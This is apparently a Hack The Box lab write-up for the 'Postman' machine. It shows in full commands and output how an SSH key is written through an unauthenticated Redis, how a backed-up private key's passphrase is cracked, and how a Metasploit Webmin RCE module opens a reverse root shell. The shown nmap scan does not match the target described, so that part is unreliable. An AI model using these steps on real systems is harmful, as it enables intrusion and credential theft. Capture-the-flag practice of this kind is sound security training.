Postman

TL;DR

  • Import SSH key in authorized_keys through REDIS
  • Retrieve backup of user’s SSH private key
  • Crack private key’s passphrase with JohnTheRipper
  • Exploit RCE on Webmin to get root access (webserver is running as root)

User.txt

Reconnaissance

Let’s start by a Nmap scan:

magnussen@funcMyLife:~/postman$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN postman.txt
Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-18 21:21 CET
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Initiating Ping Scan at 21:21
Scanning 10.10.10.171 [4 ports]
Completed Ping Scan at 21:21, 1.25s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:21
Scanning openadmin.htb (10.10.10.171) [65535 ports]
Discovered open port 80/tcp on 10.10.10.171
Discovered open port 22/tcp on 10.10.10.171
Increasing send delay for 10.10.10.171 from 0 to 5 due to 500 out of 1666 dropped probes since last increase.
Increasing send delay for 10.10.10.171 from 5 to 10 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.10.171 from 10 to 20 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.10.171 from 20 to 40 due to max_successful_tryno increase to 6
Increasing send delay for 10.10.10.171 from 40 to 80 due to max_successful_tryno increase to 7
Increasing send delay for 10.10.10.171 from 80 to 160 due to max_successful_tryno increase to 8
Increasing send delay for 10.10.10.171 from 160 to 320 due to max_successful_tryno increase to 9
Increasing send delay for 10.10.10.171 from 320 to 640 due to max_successful_tryno increase to 10
Warning: 10.10.10.171 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.171 from 640 to 1000 due to 278 out of 926 dropped probes since last increase.
Completed SYN Stealth Scan at 21:22, 40.86s elapsed (65535 total ports)
Initiating Service scan at 21:22
Scanning 2 services on openadmin.htb (10.10.10.171)
Completed Service scan at 21:22, 6.10s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.171.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 2.21s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up, received timestamp-reply ttl 63 (0.037s latency).
Scanned at 2020-02-18 21:21:41 CET for 50s
Not shown: 65531 closed ports
Reason: 65531 resets
PORT      STATE    SERVICE REASON         VERSION
22/tcp    open     ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE=
|   256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp    open     http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.10 seconds
           Raw packets sent: 200281 (8.812MB) | Rcvd: 136054 (5.442MB)

So we find 4 useful ports:

  • SSH (22)
  • Apache (80)
  • Redis (6379)
  • Webmin (10000)

The website is a presentation page, so not much here.

Let’s try to connect to the REDIS instance.

magnussen@funcMyLife:~/postman$ redis-cli -h 10.10.10.160
10.10.10.160:6379> CONFIG GET *
  1) "dbfilename"
  2) "authorized_keys"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "cluster-announce-ip"
  8) ""
  9) "unixsocket"
 10) ""
 11) "logfile"
 12) "/var/log/redis/redis-server.log"
 13) "pidfile"
 14) "/var/run/redis/redis-server.pid"
 15) "slave-announce-ip"
 16) ""
 17) "maxmemory"
 18) "0"
 19) "proto-max-bulk-len"
 20) "536870912"
 21) "client-query-buffer-limit"
 22) "1073741824"
 23) "maxmemory-samples"
 24) "5"
 25) "lfu-log-factor"
 26) "10"
 27) "lfu-decay-time"
 28) "1"
 29) "timeout"
 30) "0"
 31) "active-defrag-threshold-lower"
 32) "10"
 33) "active-defrag-threshold-upper"
 34) "100"
 35) "active-defrag-ignore-bytes"
 36) "104857600"
 37) "active-defrag-cycle-min"
 38) "25"
 39) "active-defrag-cycle-max"
 40) "75"
 41) "auto-aof-rewrite-percentage"
 42) "100"
 43) "auto-aof-rewrite-min-size"
 44) "67108864"
 45) "hash-max-ziplist-entries"
 46) "512"
 47) "hash-max-ziplist-value"
 48) "64"
 49) "list-max-ziplist-size"
 50) "-2"
 51) "list-compress-depth"
 52) "0"
 53) "set-max-intset-entries"
 54) "512"
 55) "zset-max-ziplist-entries"
 56) "128"
 57) "zset-max-ziplist-value"
 58) "64"
 59) "hll-sparse-max-bytes"
 60) "3000"
 61) "lua-time-limit"
 62) "5000"
 63) "slowlog-log-slower-than"
 64) "10000"
 65) "latency-monitor-threshold"
 66) "0"
 67) "slowlog-max-len"
 68) "128"
 69) "port"
 70) "6379"
 71) "cluster-announce-port"
 72) "0"
 73) "cluster-announce-bus-port"
 74) "0"
 75) "tcp-backlog"
 76) "511"
 77) "databases"
 78) "16"
 79) "repl-ping-slave-period"
 80) "10"
 81) "repl-timeout"
 82) "60"
 83) "repl-backlog-size"
 84) "1048576"
 85) "repl-backlog-ttl"
 86) "3600"
 87) "maxclients"
 88) "10000"
 89) "watchdog-period"
 90) "0"
 91) "slave-priority"
 92) "100"
 93) "slave-announce-port"
 94) "0"
 95) "min-slaves-to-write"
 96) "0"
 97) "min-slaves-max-lag"
 98) "10"
 99) "hz"
100) "10"
101) "cluster-node-timeout"
102) "15000"
103) "cluster-migration-barrier"
104) "1"
105) "cluster-slave-validity-factor"
106) "10"
107) "repl-diskless-sync-delay"
108) "5"
109) "tcp-keepalive"
110) "300"
111) "cluster-require-full-coverage"
112) "yes"
113) "cluster-slave-no-failover"
114) "no"
115) "no-appendfsync-on-rewrite"
116) "no"
117) "slave-serve-stale-data"
118) "yes"
119) "slave-read-only"
120) "yes"
121) "stop-writes-on-bgsave-error"
122) "yes"
123) "daemonize"
124) "yes"
125) "rdbcompression"
126) "yes"
127) "rdbchecksum"
128) "yes"
129) "activerehashing"
130) "yes"
131) "activedefrag"
132) "no"
133) "protected-mode"
134) "no"
135) "repl-disable-tcp-nodelay"
136) "no"
137) "repl-diskless-sync"
138) "no"
139) "aof-rewrite-incremental-fsync"
140) "yes"
141) "aof-load-truncated"
142) "yes"
143) "aof-use-rdb-preamble"
144) "no"
145) "lazyfree-lazy-eviction"
146) "no"
147) "lazyfree-lazy-expire"
148) "no"
149) "lazyfree-lazy-server-del"
150) "no"
151) "slave-lazy-flush"
152) "no"
153) "maxmemory-policy"
154) "noeviction"
155) "loglevel"
156) "notice"
157) "supervised"
158) "no"
159) "appendfsync"
160) "everysec"
161) "syslog-facility"
162) "local0"
163) "appendonly"
164) "no"
165) "dir"
166) "/var/lib/redis/.ssh"
167) "save"
168) "900 1 300 10 60 10000"
169) "client-output-buffer-limit"
170) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
171) "unixsocketperm"
172) "0"
173) "slaveof"
174) ""
175) "notify-keyspace-events"
176) ""
177) "bind"
178) "0.0.0.0 ::1"

Redis misconfiguration

Yeah! So we see some interesting files/directories, there is a authorized_keys file and a /var/lib/redis/.ssh directory. We can import our SSH public key in this authorized_keys file.

We have to put two blank lines before and after the public key just to be safe and separate it from other things so it can be parsed correctly.

We can then import our SSH key in order to log in to the server.

magnussen@funcMyLife:~/postman$ ssh-keygen -f postman_ssh
magnussen@funcMyLife:~/postman$ (echo -e "\n\n"; cat postman_ssh.pub; echo -e "\n\n") > postman_ssh.txt
magnussen@funcMyLife:~/postman$ cat postman_ssh.txt | redis-cli -h 10.10.10.160 -x set crackit
OK
magnussen@funcMyLife:~/postman$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> QUIT

The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account.

Let’s see if it works.

magnussen@funcMyLife:~/postman$ ssh -i postman_ssh redis@10.10.10.160
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)

Password cracking

Let’s search for useful things now:

redis@Postman:~$ ls -lha /home/
total 12K
drwxr-xr-x  3 root root 4.0K Sep 11 11:27 .
drwxr-xr-x 22 root root 4.0K Aug 25 15:03 ..
drwxr-xr-x  6 Matt Matt 4.0K Sep 11 11:28 Matt
redis@Postman:~$ ls -alh /opt/
total 12K
drwxr-xr-x  2 root root 4.0K Sep 11 11:28 .
drwxr-xr-x 22 root root 4.0K Aug 25 15:03 ..
-rwxr-xr-x  1 Matt Matt 1.8K Aug 26 00:11 id_rsa.bak
redis@Postman:~$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

We can break the passphrase with JohnTheRipper and try to use it as password for Matt.

magnussen@funcMyLife:~/postman$ ./JohnTheRipper/run/ssh2john.py matt_rsa.txt > matt_crack.txt
magnussen@funcMyLife:~/postman$ ./JohnTheRipper/run/john --wordlist=rockyou.txt matt_crack.txt
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (matt_rsa.txt)
1g 0:00:00:08 DONE (2020-02-18 23:25) 0.1168g/s 1675Kp/s 1675Kc/s 1675KC/s ¡Vamos!
Session completed

Alright, let’s get that user.txt.

magnussen@funcMyLife:~/postman$ ssh -i postman_ssh redis@10.10.10.160
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Feb 18 22:31:47 2020 from 10.10.15.131
redis@Postman:~$ su Matt
Password:
Matt@Postman:/var/lib/redis$ id
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
Matt@Postman:/var/lib/redis$ cat /home/Matt/user.txt
517ad0ec2458ca97af8d93aac08a2f3c

I AM ROOT

Webmin RCE

As we notice earlier with the nmap scan, there is a web server listening on port 10000.

Let’s check the permissions on the folder and files:

Matt@Postman:/var$ ll
total 52
drwxr-xr-x 13 root root   4096 Aug 25 18:24 ./
drwxr-xr-x 22 root root   4096 Aug 25 15:03 ../
drwxr-xr-x  2 root root   4096 Oct 29 09:24 backups/
drwxr-xr-x 11 root root   4096 Aug 25 18:24 cache/
drwxr-xr-x 37 root root   4096 Aug 25 21:24 lib/
drwxrwsr-x  2 root staff  4096 Apr 24  2018 local/
lrwxrwxrwx  1 root root      9 Aug 24 11:24 lock -> /run/lock/
drwxrwxr-x  8 root syslog 4096 Aug 25 22:02 log/
drwxrwsr-x  2 root mail   4096 Aug 24 11:24 mail/
drwxr-xr-x  2 root root   4096 Aug 24 11:24 opt/
lrwxrwxrwx  1 root root      4 Aug 24 11:24 run -> /run/
drwxr-xr-x  4 root root   4096 Aug 24 11:26 spool/
drwxrwxrwt  6 root root   4096 Feb 18 22:39 tmp/
drwx------  4 root bin    4096 Oct 29 09:24 webmin/
drwxr-xr-x  3 root root   4096 Aug 25 20:05 www/

Alright, so webmin is running as root, if we can have a webshell, we’ll be root!

Let’s try to connect to the webmin Interface.

We have to switch to HTTPS to get the login page.

Let’s try to connect with Matt’s credentials.

  • Username: Matt
  • Password: computer2008

Webmin’s version is 1.910, let’s search for exploits on Webmin1.910 in Metasploit.

msf5 > search Webmin

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   1  auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     No     Webmin File Disclosure
   2  exploit/linux/http/webmin_backdoor           2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor
   3  exploit/linux/http/webmin_packageup_rce      2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution
   4  exploit/unix/webapp/webmin_show_cgi_exec     2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution
   5  exploit/unix/webapp/webmin_upload_exec       2019-01-17       excellent  Yes    Webmin Upload Authenticated RCE

webmin_packageup_rce seems promising, let’s try it!

msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > show options
Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME                    yes       Webmin Username
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
PASSWORD => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
USERNAME => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.10.10.160
RHOSTS => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set SSL true
SSL => true
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 10.10.x.x
LHOST => 10.10.x.x
msf5 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.15.131:4444
[+] Session cookie: eb21c4f55dfe2b5dc78998f05dc284b2
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.15.131:4444 -> 10.10.10.160:58338) at 2020-02-18 23:54:45 +0100
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
a257741c5bed8be7778c6ed95686ddce

This was a nice box, not very difficult, but a good way to start on Hack The Box. Thank you TheCyberGeek for the box!